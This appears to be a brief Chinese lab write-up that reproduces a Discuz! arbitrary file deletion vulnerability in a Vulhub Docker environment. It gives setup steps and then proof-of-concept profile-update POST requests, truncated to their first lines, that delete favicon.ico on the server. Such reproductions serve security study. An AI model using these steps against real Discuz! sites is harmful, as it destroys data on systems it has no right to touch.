生活葬了童真,物欲脏了灵魂
Vulhub运行报错,因为端口占用了,默认是使用80端口

修改目录下的 docker-compose.yml 文件,前面这个端口号修改为其他空闲端口

docker-compose up -d 运行

访问网站

将 数据库服务器 修改为 db ,设置好账号密码,下一步

安装完成

注册一个用户

在个人资料页 /home.php?mod=spacecp ,找到自己的 formhash 值

带上自己的 Cookie formhash 值发送如下数据包
1 | POST /home.php?mod=spacecp&ac=profile&op=base HTTP/1.1 |
尝试删除 favicon.ico 文件

个人资料处的出生地变化 /home.php?mod=spacecp,说明修改成功

使用如下POC上传任意一个文件,上传后,文件被删除
1 | POST /home.php?mod=spacecp&ac=profile&op=base&profilesubmit=1&formhash=你的formhash HTTP/1.1 |

文件被删除
